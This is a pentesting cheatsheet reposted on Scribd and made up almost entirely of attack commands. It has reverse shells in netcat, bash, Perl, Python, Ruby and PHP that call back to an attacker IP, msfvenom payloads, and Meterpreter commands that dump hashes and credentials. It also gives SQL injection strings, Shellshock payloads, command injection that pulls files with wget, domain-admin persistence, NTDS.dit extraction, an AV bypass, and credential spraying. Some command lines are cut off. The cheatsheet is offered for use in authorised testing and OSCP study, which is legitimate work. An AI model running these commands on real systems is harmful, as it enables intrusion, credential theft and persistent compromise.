0% found this document useful (0 votes)
61 views34 pages

Cheat Cheet Pentest

This document is a comprehensive pentesting cheatsheet that includes various enumeration techniques, payloads, and exploitation methods for both Linux and Windows systems. It provides detailed commands and scripts for tasks such as privilege escalation, SQL injections, and file transfers, as well as resources for further learning. Additionally, it covers tools like Metasploit and Nmap, along with links to external resources for enhanced pentesting capabilities.

Uploaded by

Mikhaell Reis
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
61 views34 pages

Cheat Cheet Pentest

This document is a comprehensive pentesting cheatsheet that includes various enumeration techniques, payloads, and exploitation methods for both Linux and Windows systems. It provides detailed commands and scripts for tasks such as privilege escalation, SQL injections, and file transfers, as well as resources for further learning. Additionally, it covers tools like Metasploit and Nmap, along with links to external resources for enhanced pentesting capabilities.

Uploaded by

Mikhaell Reis
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 34

root@Hausec

sudo apt-get install hacking-skillz

☰ Menu

Pentesting Cheatsheet

In addition to my own contributions, this compilation is possible by other compiled cheatsheets


by g0tmilk (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/), highon.coffee
(https://highon.coffee/blog/cheat-sheet/), and pentestmonkey, (http://pentestmonkey.net/)as well
as a few others listed at the bottom. It’s easiest to search via ctrl+F, as the Table of Contents isn’t
kept up to date fully.

Pentesting Cheat Sheet

Table of Contents

Enumeration

General Enumeration

FTP Enumeration (21)

SSH (22)

SMTP Enumeration (25)

Finger Enumeration (79)

Web Enumeration (80/443)

Pop3 (110)

RPCBind (111)

SMB\RPC Enumeration (139/445)


Linux Reverse Meterpreter payload

Meterpreter Cheat Sheet

Meterpreter Payloads

Binaries

Web Payloads

Scripting Payloads

Shellcode

Handlers

Powershell

Privilege Escalation

Linux

Windows

Command Injection

File Traverse

Test HTTP options using curl

Upload file using CURL to website with PUT option available. 11

Transfer file

Activate shell file


SQLInjections

Injections

SQLMap

Miscellaneous

Tunneling: 11

AV Bypass: 12

Web hosts. 12

Php Meterpreter Shell

Reverse shell using interpreters

Shellshock

Resources & Links

Windows Privilege Escalation

SQL & Apache Log paths

Recon

Cheat Sheets (Includes scripts)

Meterpreter Stuff

Proxy Chaining

Huge collection of common commands and scripts as well as general pentest info

Scripts

Pentester Bookmarks, huge collection of blogs, forums, and resources

Pentest Checklist

OSCP Writeups, blogs, and notes


Enumeration

General Enumeration:

nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1

Verbose, syn, all ports, all scripts, no ping

nmap -v -sS -A -T4 x.x.x.x

Verbose, SYN Stealth, Version info, and scripts against services.

nmap –script smb-check-vulns.nse –script-args=unsafe=1 -p445 [host]

Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause
knockover

netdiscover -r 192.168.1.0/24

FTP Enumeration (21):

nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vs


SSH (22):

ssh INSERTIPADDRESS 22

SMTP Enumeration (25):

nmap –script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-v

nc -nvv INSERTIPADDRESS 25

telnet INSERTIPADDRESS 25

Finger Enumeration (79):

Download script and run it with a wordlist: http://pentestmonkey.net/tools/user-


enumeration/finger-user-enum

Web Enumeration (80/443):

dirbuster (GUI)

dirb http://10.0.0.1/
nikto –h 10.0.0.1

Pop3 (110):

telnet INSERTIPADDRESS 110

USER [username]

PASS [password]

To login

LIST

To list messages

RETR [message number]

Retrieve message

QUIT

quits

RPCBind (111):
rpcinfo –p x.x.x.x

SMB\RPC Enumeration (139/445):

enum4linux –a 10.0.0.1

nbtscan x.x.x.x
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios
name and discover client workgroup / domain

py 192.168.XXX.XXX 500 50000 dict.txt

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.X

nmap IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-p

smbclient -L //INSERTIPADDRESS/

List open shares

smbclient //INSERTIPADDRESS/ipc$ -U john

SNMP Enumeration (161):


snmpwalk -c public -v1 10.0.0.0

snmpcheck -t 192.168.1.X -c public

onesixtyone -c names -i hosts

nmap -sT -p 161 192.168.X.X -oG snmp_results.txt

snmpenum -t 192.168.1.X

Oracle (1521):

tnscmd10g version -h INSERTIPADDRESS

tnscmd10g status -h INSERTIPADDRESS

Mysql Enumeration (3306):


nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases

DNS Zone Transfers:

nslookup -> set type=any -> ls -d blah.com

dig axfr blah.com @ns1.blah.com

This one works the best in my experience

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput

Mounting File Share

showmount -e IPADDR

mount 192.168.1.1:/vol/share /mnt/nfs -nolock

mounts the share to /mnt/nfs without locking it

mount -t cifs -o username=user,password=pass, domain=blah //192.168.1.X/


Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will
prompt on the CLI (more secure as it wont end up in bash_history)

net use Z: \\win-server\share password /user:domain\janedoe /savecred /

Mount a Windows share on Windows from the command line

apt-get install smb4k –y

Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Fingerprinting: Basic versioning / finger printing via displayed


banner

nc -v 192.168.1.1 25

telnet 192.168.1.1 25

Exploit Research

searchsploit windows 2003 | grep -i local

Search exploit-db for exploit, in this example windows 2003 + local esc

Compiling Exploits
gcc -o exploit exploit.c

Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Compile windows .exe on Linux

Packet Inspection:

tcpdump tcp port 80 -w output.pcap -i eth0

tcpdump for port 80 on interface eth0, outputs to output.pcap

Password Cracking

hash-identifier [hash]

john hashes.txt

hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlist


hashcat -m 1000 dump.txt -o output.txt --remove -a 3 ?u?l?l?d?d?d?d

Brute force crack for NTLM hashes with an uppercase, lowercase, lowercase, and 4 digit
mask
List of hash types and examples for hashcat https://hashcat.net/wiki/doku.php?
id=example_hashes (https://hashcat.net/wiki/doku.php?id=example_hashes)
https://hashkiller.co.uk (https://hashkiller.co.uk) has a good repo of already cracked MD5 and
NTLM hashes

Bruteforcing:

hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^U

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR

hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V

Hydra SMTP Brute force

Shells & Reverse Shells

SUID C Shells

bin/bash:
int main(void){

setresuid(0, 0, 0);

system("/bin/bash");

bin/sh:

int main(void){

setresuid(0, 0, 0);

system("/bin/sh");

TTY Shell:

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

/bin/sh –i

execute('/bin/sh')

LUA
!sh

Privilege Escalation via nmap

:!bash

Privilege escalation via vi

Spawn Ruby Shell

exec "/bin/sh"

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("

Netcat

nc -e /bin/sh ATTACKING-IP 80

/bin/sh | nc ATTACKING-IP 80

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p


Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

PHP

-r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

(Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)

Bash

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&

# or: while read line 0<&5; do $line 2>&5 >&5; done


bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Perl

exec "/bin/sh";

perl —e 'exec "/bin/sh";'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN-

Windows

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM

Windows

Meterpreter

Windows reverse meterpreter payload


set payload windows/meterpreter/reverse_tcp

Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp

Meterpreter Windows VNC Payload

set ViewOnly false

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp

Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

upload file c:\\windows

Meterpreter upload file to Windows target


download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target

download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target

execute -f c:\\windows\temp\exploit.exe

Meterpreter run .exe on target – handy for executing uploaded exploits

execute -f cmd -c

Creates new channel with cmd shell

ps

Meterpreter show processes

shell

Meterpreter get shell on the target

getsystem

Meterpreter attempts priviledge escalation the target

hashdump
Meterpreter attempts to dump the hashes on the target (must have privileges; try
migrating to winlogon.exe if possible first)

portfwd add –l 3389 –p 3389 –r target

Meterpreter create port forward to target machine

portfwd delete –l 3389 –p 3389 –r target

Meterpreter delete port forward

use exploit/windows/local/bypassuac

Bypass UAC on Windows 7 + Set target + arch, x86/64

use auxiliary/scanner/http/dir_scanner

Metasploit HTTP directory scanner

use auxiliary/scanner/http/jboss_vulnscan

Metasploit JBOSS vulnerability scanner

use auxiliary/scanner/mssql/mssql_login

Metasploit MSSQL Credential Scanner

use auxiliary/scanner/mysql/mysql_version

Metasploit MSSQL Version Scanner


use auxiliary/scanner/oracle/oracle_login

Metasploit Oracle Login Module

use exploit/multi/script/web_delivery

Metasploit powershell payload delivery module

post/windows/manage/powershell/exec_powershell

Metasploit upload and run powershell script through a session

use exploit/multi/http/jboss_maindeployer

Metasploit JBOSS deploy

use exploit/windows/mssql/mssql_payload

Metasploit MSSQL payload

run post/windows/gather/win_privs

Metasploit show privileges of current user

use post/windows/gather/credentials/gpp

Metasploit grab GPP saved passwords

load kiwi
creds_all

Metasploit load Mimikatz/kiwi and get creds

run post/windows/gather/local_admin_search_enum

Idenitfy other machines that the supplied domain user has administrative access to

set AUTORUNSCRIPT post/windows/manage/migrate

Meterpreter Payloads

msfvenom –l

List options

Binaries

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > she

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.mac


Web Payloads

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php

PHP

set payload php/meterpreter/reverse_tcp

Listener

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpa

PHP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell

ASP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

WAR

Scripting Payloads
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Python

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Bash

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Perl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters.
Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive


your incoming shells. Handlers should be in the following format.

exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSessio


An example is:

msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= L

Powershell

Execution Bypass

Set-ExecutionPolicy Unrestricted
./file.ps1

Import-Module script.psm1
Invoke-FunctionThatIsIntheModule

iex(new-object system.net.webclient).downloadstring(“file:///C:\examplef

Powershell.exe blocked

Use ‘not powershell’ https://github.com/Ben0xA/nps (https://github.com/Ben0xA/nps)

Persistence

net user username "password" /ADD

net group "Domain Admins" %username% /DOMAIN /ADD

Gather NTDS.dit file

ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit

Privilege Escalation

Linux:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
(https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

https://github.com/pentestmonkey/unix-privesc-check (https://github.com/pentestmonkey/unix-
privesc-check)

Windows:

https://github.com/pentestmonkey/windows-privesc-check
(https://github.com/pentestmonkey/windows-privesc-check)

http://www.fuzzysecurity.com/tutorials/16.html (http://www.fuzzysecurity.com/tutorials/16.html)

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
(https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/)

Command Injection

File Traverse:
website.com/file.php[?path=/]

Test HTTP options using curl:

curl -vX OPTIONS [website]

Upload file using CURL to website with PUT option available

curl --upload-file shell.php --url http://192.168.218.139/test/shell.php

Transfer file (Try temp directory if not writable)(wget -O tells it where


to store):

?path=/; wget http://IPADDRESS:8000/FILENAME.EXTENTION;

Activate shell file:

; php -f filelocation.php;
SQLInjections

Common Injections for Login Forms:

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—

SQLMap

sqlmap -u http://meh.com (http://meh.com) --forms --batch --crawl=10 --


cookie=jsessionid=54321 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u http://INSERTIPADDRESS (http://INSERTIPADDRESS) --dbms=mysql --
crawl=3
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --
current-user --current-db --passwords --file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-
agent --dump Scan url for union + error based injection with mysql backend and use a
random user agent + database dump
sqlmap -o -u "http://meh.com/form/" –forms
sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users –
dump
sqlmap dump and crack hashes for table users on database-name.
sqlmap --flush session
Flushes the session
sqlmap -p user --technique=B
Attempts to exploit the “user” field using boolean technique.
sqlmap -r <captured request>
Capture a request via Burp Suite, save it to a file, and use this command to let sqlmap
automate everything. Add –os-shell at the end to pop a shell if possible.
Miscellaneous

NTLMRelayx.py using mitm6

This will take captured credentials via IPv6 spoofing using mitm6 and relay them to a target via
ntlmrelayx.py. It requires ntlmrelayx.py and mitm6 to be installed already.

mitm6 -d <domain.local>

First, start mitm6 and specify the domain you’re spoofing on with ‘-d domain.name’

ntlmrelayx.py -6 -wh 192.168.1.1 -t smb://192.168.1.2 -l ~/tmp/

-6 specifies ipv6, -wh specifies where the WPAD file is hosted at (your IP usually). -t
specifies the target, or destination where the credentials will be relayed. -l is to where to
store the loot.

Name your terminal whatever you want

This small script will name your terminal whatever you pass as an argument to it. It helps
organizing with multiple terminals open. Thanks Ben!

#!bin/bash

echo -ne "\033]0;${1}\007"

Tunneling:

sshuttle is an awesome tunneling tool that does all the hard work for you. It gets rid of the need
for proxy chains. What this command does is tunnels traffic through 10.0.0.1 and makes a route
for all traffic destined for 10.10.10.0/24 through your sshuttle tunnel.

sshuttle -r [email protected] 10.10.10.0/24


AV Bypass:

wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe

wine and hyperion need to be installed.

Web hosts

python -m SimpleHTTPServer 80
Basic HTTP Server. Will list the directory it’s started in.
service apache2 start
Starts Apache web server. Place files in /var/www/html to be able to ‘wget’ them.

Php Meterpreter Shell (Remove Guard bit)

msfvenom -p php/meterpreter/reverse_tcp LHOST=????????? LPORT=6000 R >


phpmeterpreter.php

Netcat

Listener: nc -lvp <PORT>


Listen verbosely on a port.
Target: nc -e /bin/bash listeneripaddress listenerport
or ncat -v -l -p 7777 -e /bin/bash
Host: cat happy.txt | ncat -v -l -p 5555 Target: ncat localhost 5555 >
happy_copy.txt
Download file via ncat

Reverse shell using interpreters (http://pentestmonkey.net/cheat-


sheet/shells/reverse-shell-cheat-sheet
(http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-
sheet))

python -c python -c 'import


socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.
connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c "exec(\"import socket, subprocess;s =
socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc =
subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

Shellshock

curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >&


/dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 192.168.28.167:PORT -H "User-Agent: () { ignored;};/bin/bash -i >&
/dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status
ssh username@IPADDRESS '() { :;}; /bin/bash'
Shellshock over SSH

CrackMapExec

crackmapexec smb 10.0.0.1/24 -u administrator -p 'password' --local-aut

Spray the network with local login credentials then dump SAM contents

crackmapexec smb 10.0.0.1/24 -u administrator -H <hash> --local-auth --

Pass the hash network-wide, local login, dump LSA contents

crackmapexec smb 192.168.10.0/24 -u username -p password -M empire_exec

Requires Empire Restful API to be running. It will spray supply credentials and pop an
empire agent on any successful login. Read more here
(https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101)
Resources & Links

Windows Privilege Escalation

http://www.fuzzysecurity.com/tutorials/16.html (http://www.fuzzysecurity.com/tutorials/16.html)

https://toshellandback.com/2015/11/24/ms-priv-esc/ (https://toshellandback.com/2015/11/24/ms-
priv-esc/)

SQL & Apache Log paths

http://www.itninja.com/blog/view/mysql-and-apache-profile-log-path-locations
(http://www.itninja.com/blog/view/mysql-and-apache-profile-log-path-locations)

Recon

https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/
(https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/)

Cheat Sheets (Includes scripts):

http://pentestmonkey.net/ (http://pentestmonkey.net/)

https://highon.coffee/blog/cheat-sheet/ (https://highon.coffee/blog/cheat-sheet/)

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
(https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)

Meterpreter Stuff
http://netsec.ws/?p=331 (http://netsec.ws/?p=331)

Proxy Chaining

apt-get install sshuttle

https://github.com/sshuttle/sshuttle (https://github.com/sshuttle/sshuttle)

https://github.com/rofl0r/proxychains-ng (https://github.com/rofl0r/proxychains-ng)

https://www.offensive-security.com/metasploit-unleashed/proxytunnels/ (https://www.offensive-
security.com/metasploit-unleashed/proxytunnels/)

Huge collection of common commands and scripts as well


as general pentest info

https://bobloblaw.gitbooks.io/security/content/ (https://bobloblaw.gitbooks.io/security/content/)

Scripts

https://github.com/rebootuser/LinEnum (https://github.com/rebootuser/LinEnum)

https://github.com/mzet-/linux-exploit-suggester (https://github.com/mzet-/linux-exploit-
suggester)

https://github.com/azmatt/windowsEnum (https://github.com/azmatt/windowsEnum)

https://github.com/leebaird/discover (https://github.com/leebaird/discover)

https://nmap.org/nsedoc/ (https://nmap.org/nsedoc/)

Pentester Bookmarks, huge collection of blogs, forums,


and resources.
https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki
(https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki)

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
(https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

Pentest Checklist

http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf
(http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf)

Pentesting Workflow

https://workflowy.com/s/FgBl.6qcAQUUqWM (https://workflowy.com/s/FgBl.6qcAQUUqWM)

OSCP Writeups, blogs, and notes:

https://xapax.github.io/blog/2017/01/14/OSCP.html
(https://xapax.github.io/blog/2017/01/14/OSCP.html)

http://www.securitysift.com/offsec-pwb-oscp/ (http://www.securitysift.com/offsec-pwb-oscp/)

https://netsecfocus.com/topic/32/oscp-like-vulnhub-vms (https://netsecfocus.com/topic/32/oscp-
like-vulnhub-vms)

https://blog.propriacausa.dewp-content/uploads/2016/07/oscp_notes.html
(https://blog.propriacausa.dewp-content/uploads/2016/07/oscp_notes.html)

https://localhost.exposed/path-to-oscp/ (https://localhost.exposed/path-to-oscp/)

https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_oscp/
(https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_oscp/)

https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-off-my.html
(https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-off-my.html)

http://www.securitysift.com/offsec-pwb-oscp/ (http://www.securitysift.com/offsec-pwb-oscp/)

You might also like